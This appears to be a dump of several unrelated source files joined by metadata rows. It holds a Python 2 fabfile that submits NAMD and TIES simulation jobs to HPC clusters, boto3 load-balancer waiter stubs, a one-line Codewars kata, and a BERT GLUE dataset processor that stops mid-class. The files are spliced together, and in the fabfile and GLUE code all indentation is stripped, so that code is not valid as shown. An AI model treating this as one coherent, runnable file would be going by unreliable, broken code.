images : number of images to take
steering : steering session i.d.
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 32
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script='namd',
wall_time='1:00:00',memory='2G',job_type='parallel',job_class='micro'),args)
@task
def bac_namd_archerlike(config,**args):
"""Submit ensemble NAMD equilibration-simulation jobs to the ARCHER or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 2400
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, replicas=25, wall_time='24:00:00',memory='2G'),args)
@task
def bac_namd_hartreelike(config,**args):
"""Submits ensemble NAMD equilibration-simulation jobs to HARTREE or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
mem : memory of nodes requested for Bluewonder Phase 1. By default is 32000,
but higher memory nodes can be requested by using other values. For eg. use 64000 for >64 GB memory nodes.
"""
if not args.get('cores'):
args["cores"] = 384
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
print "WARNING: replicas argument not specified. Setting a default value of", env.replicas
# sys.exit()
with_config(config)
execute(put_configs,config)
for ri in xrange(1,int(env.replicas)+1):
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, wall_time='6:00', memory='2G', mem=25000, replicas=env.replicas, replica_index=ri),args)
@task
def bac_ties_archerlike(config,**args):
"""Creates appropriate directory structure for TIES calculation given that it is already restructured using dir_structure function of FabSim.
"""
if not args.get('cores'):
args["cores"] = 6240
update_environment(args)
# Workaround to ensure env.cores is set before we calculate cores_per_lambda.
if not env.get('replicas'):
env.replicas=5
if not env.get('lambda_list'):
env.update(dict(lambda_list= '0.00 0.05 0.10 0.20 0.30 0.40 0.50 0.60 0.70 0.80 0.90 0.95 1.00'))
print "WARNING: lambda_list argument not specified. Setting a default value of", env.lambda_list
with_config(config)
execute(put_configs,config)
env.cores_per_lambda = int(env.cores) / len(env.lambda_list.split(" "))
env.cores_per_replica_per_lambda = int(env.cores_per_lambda) / int(env.replicas)
job(dict(script=env.bac_ties_script, stages_eq=11, stages_sim=1, wall_time='12:00:00', memory='2G'),args)
# for i in env.lambda_list.split(" "):
# run("rsync -avz --exclude 'LAMBDA_*' %s/ %s/LAMBDA_%.2f/" % (env.job_config_path, env.job_config_path, float(i)))
# job(dict(script=env.bac_ties_script,cores=960, stages_eq=11, stages_sim=1, replicas=10, lambda_list=env.lambda_list, lambda_index='%.2f' % float(i), wall_time='12:00:00', memory='2G'),args)
@task
def bac_namd_supermuclike(config,**args):
"""Submit ensemble NAMD equilibration-simulation jobs to the SuperMUC or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 7000
update_environment(args)
if not env.get('replicas'):
env.replicas=25
calc_nodes()
env.nodes_new = "%s" % (int(env.nodes)+1)
env.cores_per_replica = int(env.cores) / int(env.replicas)
if not env.get('nodes_per_replica'):
env.update(dict(nodes_per_replica = int(env.cores_per_replica) / int(env.corespernode)))
with_config(config)
local("cp %s/redis_header.txt %s" % (env.local_templates_path[-1], env.job_config_path_local))
execute(put_configs,config)
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, wall_time='06:00:00',memory='2G', job_type='MPICH', job_class='general', island_count='1', nodes_new=env.nodes_new),args)
@task
def bac_ties_supermuclike(config,**args):
"""Creates appropriate directory structure for TIES calculation given that it is already restructured using dir_structure function of FabSim.
"""
# Workaround to ensure env.cores is set before we calculate cores_per_lambda.
if not args.get('cores'):
args["cores"] = 18200
update_environment(args)
if not env.get('replicas'):
env.replicas=5
if not env.get('lambda_list'):
env.update(dict(lambda_list= '0.00 0.05 0.10 0.20 0.30 0.40 0.50 0.60 0.70 0.80 0.90 0.95 1.00'))
print "WARNING: lambda_list argument not specified. Setting a default value of", env.lambda_list
env.cores_per_lambda = int(env.cores) / len(env.lambda_list.split(" "))
env.cores_per_replica_per_lambda = int(env.cores_per_lambda) / int(env.replicas)
if not env.get('nodes_per_replica_per_lambda'):
env.update(dict(nodes_per_replica_per_lambda = int(env.cores_per_replica_per_lambda) / int(env.corespernode)))
calc_nodes()
env.nodes_new = "%s" % (int(env.nodes)+1)
with_config(config)
local("cp %s/redis_header.txt %s" % (env.local_templates_path[-1], env.job_config_path_local))
execute(put_configs,config)
job(dict(script=env.bac_ties_script, stages_eq=11, stages_sim=1, wall_time='06:00:00', memory='2G', job_type='MPICH', job_class='general', island_count='1', nodes_new=env.nodes_new),args)
@task
def bac_nmode_archerlike(config,**args):
"""Submit ensemble NMODE/MMPB(GB)SA jobs to the ARCHER or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 240
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script=env.bac_ensemble_nmode_script,
replicas=5, wall_time='12:00:00',memory='2G'),args)
@task
def bac_nmode_hartreelike(config,**args):
"""Submits ensemble NMODE/MMPB(GB)SA equilibration-simulation jobs to HARTREE or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
mem : memory of nodes requested for Bluewonder Phase 1. By default is 32000,
but higher memory nodes can be requested by using other values. For eg. use 64000 for >64 GB memory nodes.
"""
if not args.get('cores'):
args["cores"] = 24
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
print "WARNING: replicas argument not specified. Setting a default value of", env.replicas
# sys.exit()
with_config(config)
execute(put_configs,config)
for ri in xrange(1,int(env.replicas)+1):
job(dict(script=env.bac_ensemble_nmode_script,
wall_time='24:00', memory='2G', mem=25000, replica_index=ri),args)
@task
def bac_nm_remote_archerlike(**args):
"""Submit ensemble NMODE/MMPB(GB)SA jobs to the ARCHER or similar machines,
when the simulation data is already on the remote machine.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
wall_time : wall-time job limit
memory : memory per node
remote_path : The path of root directory where all data of ensemble jobs is located;
to be provided by user as an argument
"""
if not args.get('cores'):
args["cores"] = 1200
update_environment(args)
with_config('')
#execute(put_configs,config)
#print "$results_path"
job(dict(config='',script=env.bac_ensemble_nm_remote_script,
replicas=25, wall_time='24:00:00',memory='2G'),args)
@task
def bac_nm_remote_hartreelike(**args):
"""Submits ensemble NMODE/MMPB(GB)SA equilibration-simulation jobs to HARTREE or similar machines,
when the simulation data is already on the remote machine.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
mem : memory of nodes requested for Bluewonder Phase 1. By default is 32000,
but higher memory nodes can be requested by using other values. For eg. use 64000 for >64 GB memory nodes.
remote_path : The path of root directory where all data of ensemble jobs is located;
to be provided by user as an argument
"""
if not args.get('cores'):
args["cores"] = 24
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
print "WARNING: replicas argument not specified. Setting a default value of", env.replicas
# sys.exit()
with_config('')
#execute(put_configs,config)
for ri in xrange(1,int(env.replicas)+1):
job(dict(config='',script=env.bac_ensemble_nm_remote_script,
wall_time='24:00', memory='2G', mem=25000, replica_index=ri),args)
@task
def find_namd_executable():
"""
Searches module system to locate a NAMD executable.
"""
namd_modules = probe('namd')
print namd_modules
for line in namd_modules.split("\n"):
if "(" in line:
print line
stripped_line = (line.strip()).split("(")
print "which namd2"
namd = run("module load %s && which namd2" % stripped_line[0])
print "FabMD: NAMD executable is located at:", namd
return namd
print "No relevant modules found. Trying a basic which command."
namd = run("which namd2")
return namd
@task
def dir_structure(num_rep,path):
""" Creates appropriate directory structure for ensemble simulations from the initial directory structure created by BAC builder.
num_rep is number of replicas desired and path is the full path (upto rep0) of the original directory created by BAC builder. """
if len(num_rep)<1:
print "error: number of replicas not defined."
sys.exit()
if len(path)<1:
print "error: path of rep0 not defined."
sys.exit()
print "restructuring directory for ensemble simulations"
local("mkdir -p %s/replicas/rep1" % path)
for d in ['data', 'dcds', 'analysis_scripts', 'run_scripts']:
local("rm -r %s/%s" % (path, d))
for d in ['equilibration','simulation']:
local("mv %s/%s %s/replicas/rep1 2>/dev/null; true" % (path, d, path))
local("mv %s/fe-calc/build/* %s/build/ ; rm -r %s/fe-calc" % (path, path, path))
local("mkdir -p %s/replicas/rep1/fe-calc" % path)
for x in xrange(2, int(num_rep) + 1):
local("cp -r %s/replicas/rep1 %s/replicas/rep%s" % (path, path, x))
local("cp %s/fep.tcl %s" % (env.local_templates_path[0], path))
| 40.909657 | 194 | 0.721368 | 2,075 | 13,132 | 4.457349 | 0.145542 | 0.023354 | 0.011893 | 0.012974 | 0.814034 | 0.789815 | 0.765813 | 0.747 | 0.737377 | 0.736512 | 0 | 0.034309 | 0.167682 | 13,132 | 320 | 195 | 41.0375 | 0.811894 | 0.070362 | 0 | 0.608696 | 0 | 0.018634 | 0.208589 | 0.007596 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.006211 | null | null | 0.080745 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e35d9a6654f48da341874d047b5cb20f5607160 | 11,704 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Dict
from typing import List
from botocore.waiter import Waiter
class LoadBalancerAvailable(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class LoadBalancerExists(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class LoadBalancersDeleted(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class TargetDeregistered(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_target_health` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeTargetHealth>`_
**Request Syntax**
::
waiter.wait(
TargetGroupArn='string',
Targets=[
{
'Id': 'string',
'Port': 123,
'AvailabilityZone': 'string'
},
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type TargetGroupArn: string
:param TargetGroupArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the target group.
:type Targets: list
:param Targets:
The targets.
- *(dict) --*
Information about a target.
- **Id** *(string) --* **[REQUIRED]**
The ID of the target. If the target type of the target group is ``instance`` , specify an instance ID. If the target type is ``ip`` , specify an IP address. If the target type is ``lambda`` , specify the ARN of the Lambda function.
- **Port** *(integer) --*
The port on which the target is listening.
- **AvailabilityZone** *(string) --*
An Availability Zone or ``all`` . This determines whether the target receives traffic from the load balancer nodes in the specified Availability Zone or from all enabled Availability Zones for the load balancer.
This parameter is not supported if the target type of the target group is ``instance`` .
If the target type is ``ip`` and the IP address is in a subnet of the VPC for the target group, the Availability Zone is automatically detected and this parameter is optional. If the IP address is outside the VPC, this parameter is required.
With an Application Load Balancer, if the target type is ``ip`` and the IP address is outside the VPC for the target group, the only supported value is ``all`` .
If the target type is ``lambda`` , this parameter is optional and the only supported value is ``all`` .
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class TargetInService(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_target_health` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeTargetHealth>`_
**Request Syntax**
::
waiter.wait(
TargetGroupArn='string',
Targets=[
{
'Id': 'string',
'Port': 123,
'AvailabilityZone': 'string'
},
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type TargetGroupArn: string
:param TargetGroupArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the target group.
:type Targets: list
:param Targets:
The targets.
- *(dict) --*
Information about a target.
- **Id** *(string) --* **[REQUIRED]**
The ID of the target. If the target type of the target group is ``instance`` , specify an instance ID. If the target type is ``ip`` , specify an IP address. If the target type is ``lambda`` , specify the ARN of the Lambda function.
- **Port** *(integer) --*
The port on which the target is listening.
- **AvailabilityZone** *(string) --*
An Availability Zone or ``all`` . This determines whether the target receives traffic from the load balancer nodes in the specified Availability Zone or from all enabled Availability Zones for the load balancer.
This parameter is not supported if the target type of the target group is ``instance`` .
If the target type is ``ip`` and the IP address is in a subnet of the VPC for the target group, the Availability Zone is automatically detected and this parameter is optional. If the IP address is outside the VPC, this parameter is required.
With an Application Load Balancer, if the target type is ``ip`` and the IP address is outside the VPC for the target group, the only supported value is ``all`` .
If the target type is ``lambda`` , this parameter is optional and the only supported value is ``all`` .
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
| 46.444444 | 255 | 0.581852 | 1,283 | 11,704 | 5.296181 | 0.124708 | 0.039735 | 0.022664 | 0.030905 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0 | 0.018056 | 0.332792 | 11,704 | 251 | 256 | 46.629482 | 0.852094 | 0.76461 | 0 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.277778 | 0.166667 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
6e534142ddb728479e711b8540a3bdc7ed2a0726 | 179 | py | Python | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | null | null | null | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | def remove_every_other(my_list):
# Your code here!
a = my_list[::2]
return a
def remove_every_other2(my_list):
return [v for c,v in enumerate(my_list) if not c%2] | 25.571429 | 55 | 0.681564 | 34 | 179 | 3.352941 | 0.588235 | 0.210526 | 0.245614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.212291 | 179 | 7 | 55 | 25.571429 | 0.787234 | 0.083799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
2839358a82feb78190909af5915ea71571e9c775 | 15,755 | py | Python | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | 2 | 2020-05-08T10:19:36.000Z | 2020-05-08T12:54:34.000Z | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | 5 | 2020-05-09T10:08:21.000Z | 2020-05-27T03:31:15.000Z | bert_optimization/glue_processor.py | jeongukjae/bert-optimization | a40761259a0844635272e35711e5fe6e8e771f5c | [
"MIT"
] | null | null | null | import os
from abc import ABC, abstractmethod, abstractstaticmethod
from typing import Dict, List, Optional, Tuple
import tensorflow as tf
import tensorflow_addons as tfa
from . import tokenizer
from .metrics import F1Score
def read_table(input_path: str, delimiter: str = "\t") -> List[List[str]]:
"""
read table file (like tsv, csv)
change delimiter to parse another format.
"""
with open(input_path) as f:
return [line.strip().split(delimiter) for line in f]
def convert_single_sentence(
data: Tuple[Optional[List[str]], List[str]],
label_to_index: Dict[str, int],
tokenizer: tokenizer.SubWordTokenizer,
max_length: int,
):
labels = [0] * len(data[1]) if data[0] is None else [label_to_index[label] for label in data[0]]
input_ids = []
attention_mask = []
token_type_ids = []
for example in data[1]:
tokens = tokenizer.tokenize(example)[: max_length - 2]
ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens + ["[SEP]"])
padding_size = max_length - len(ids)
input_ids.append(ids + [0] * padding_size)
token_type_ids.append([0] * max_length)
attention_mask.append([1.0] * len(ids) + [0.0] * padding_size)
return (labels, input_ids, token_type_ids, attention_mask)
def convert_sentence_pair(
data: Tuple[Optional[List[str]], List[str], List[str]],
label_to_index: Dict[str, int],
tokenizer: tokenizer.SubWordTokenizer,
max_length: int,
):
labels = [0] * len(data[1]) if data[0] is None else [label_to_index[label] for label in data[0]]
input_ids = []
attention_mask = []
token_type_ids = []
for example_index in range(len(data[1])):
tokens_a = tokenizer.tokenize(data[1][example_index])
tokens_b = tokenizer.tokenize(data[2][example_index])
truncate_seq_pair(tokens_a, tokens_b, max_length - 3)
ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens_a + ["[SEP]"] + tokens_b + ["[SEP]"])
padding_size = max_length - len(ids)
input_ids.append(ids + [0] * padding_size)
token_type_ids.append([0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1) + [0] * padding_size)
attention_mask.append([1.0] * len(ids) + [0.0] * padding_size)
assert len(input_ids[-1]) == max_length
assert len(token_type_ids[-1]) == max_length
assert len(attention_mask[-1]) == max_length
return (labels, input_ids, token_type_ids, attention_mask)
def truncate_seq_pair(tokens_a, tokens_b, max_length):
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class GLUEClassificationProcessor(ABC):
@abstractmethod
def get_train(self, path: str):
raise NotImplementedError
@abstractmethod
def get_dev(self, path: str):
raise NotImplementedError
@abstractmethod
def get_test(self, path: str):
raise NotImplementedError
@abstractstaticmethod
def get_label_to_index(self):
raise NotImplementedError
@abstractmethod
def update_state(self, target, preds, validation=False):
raise NotImplementedError
@abstractmethod
def get_metrics(self, validation=False):
raise NotImplementedError
@abstractmethod
def reset_states(self, validation=False):
raise NotImplementedError
@abstractmethod
def get_hash(self):
raise NotImplementedError
@abstractmethod
def get_key(self):
raise NotImplementedError
class CoLAProcessor(GLUEClassificationProcessor):
def __init__(self):
self.mcc = tfa.metrics.MatthewsCorrelationCoefficient(num_classes=1)
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_mcc = tfa.metrics.MatthewsCorrelationCoefficient(num_classes=1)
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
def get_train(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_cola_dataset(read_table(os.path.join(path, "train.tsv")), True)
def get_label_to_index(self):
return {"1": 1, "0": 0}
@tf.function
def update_state(self, targets, preds, validation=False):
if validation:
self.val_acc.update_state(targets, preds)
self.val_mcc.update_state(tf.expand_dims(targets, 1), tf.expand_dims(tf.argmax(preds, -1), 1))
else:
self.acc.update_state(targets, preds)
self.mcc.update_state(tf.expand_dims(targets, 1), tf.expand_dims(tf.argmax(preds, -1), 1))
def get_metrics(self, validation=False):
if validation:
return {"Acc": self.val_acc.result(), "MCC": self.val_mcc.result()[0]}
return {"Acc": self.acc.result(), "MCC": self.mcc.result()[0]}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
self.val_mcc.reset_states()
else:
self.acc.reset_states()
self.mcc.reset_states()
def get_hash(self):
return f"{self.val_mcc.result()[0]:.4f}-{self.val_acc.result():.4f}"
def get_key(self):
return self.val_mcc.result()[0]
@staticmethod
def parse_cola_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str]]:
"""
Parse CoLA Dataset (GLUE)
"""
if is_test:
# test.tsv has header row
return None, [line[1] for line in lines[1:]]
return [line[1] for line in lines], [line[3] for line in lines]
class MRPCProcessor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.f1 = F1Score()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_f1 = F1Score()
def get_train(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_mrpc_dataset(read_table(os.path.join(path, "train.tsv")), True)
def get_label_to_index(self):
return {"1": 1, "0": 0}
@tf.function
def update_state(self, targets, preds, validation=False):
maxed_preds = tf.math.argmax(preds, -1)
if validation:
self.val_acc.update_state(targets, preds)
self.val_f1.update_state(targets, maxed_preds)
else:
self.acc.update_state(targets, preds)
self.f1.update_state(targets, maxed_preds)
def get_metrics(self, validation=False):
if validation:
return {
"Acc": self.val_acc.result(),
"F1": self.val_f1.result(),
}
return {
"Acc": self.acc.result(),
"F1": self.f1.result(),
}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
self.val_f1.reset_states()
else:
self.acc.reset_states()
self.f1.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_mrpc_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
"""
Parse MRPC Dataset (GLUE)
"""
# dataset files have a header row
lines = lines[1:]
if is_test:
return None, [line[3] for line in lines], [line[4] for line in lines]
return [line[0] for line in lines], [line[3] for line in lines], [line[4] for line in lines]
class MNLIProcessor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
def get_train(self, path: str):
return self.parse_mnli_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_mnli_dataset(read_table(os.path.join(path, "dev_matched.tsv")), False)
def get_test(self, path: str):
return self.parse_mnli_dataset(read_table(os.path.join(path, "test_matched.tsv")), True)
def get_label_to_index(self):
return {"contradiction": 0, "entailment": 1, "neutral": 2}
@tf.function
def update_state(self, targets, preds, validation=False):
if validation:
self.val_acc.update_state(targets, preds)
else:
self.acc.update_state(targets, preds)
def get_metrics(self, validation=False):
if validation:
return {"Acc": self.val_acc.result()}
return {"Acc": self.acc.result()}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
else:
self.acc.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_mnli_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
"""
Parse MNLI Dataset (GLUE)
"""
# dataset files have a header row
lines = lines[1:]
if is_test:
return None, [line[8] for line in lines], [line[9] for line in lines]
return [line[-1] for line in lines], [line[8] for line in lines], [line[9] for line in lines]
class SST2Processor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
def get_train(self, path: str):
return self.parse_sst2_dataset(read_table(os.path.join(path, "train.tsv")), False)
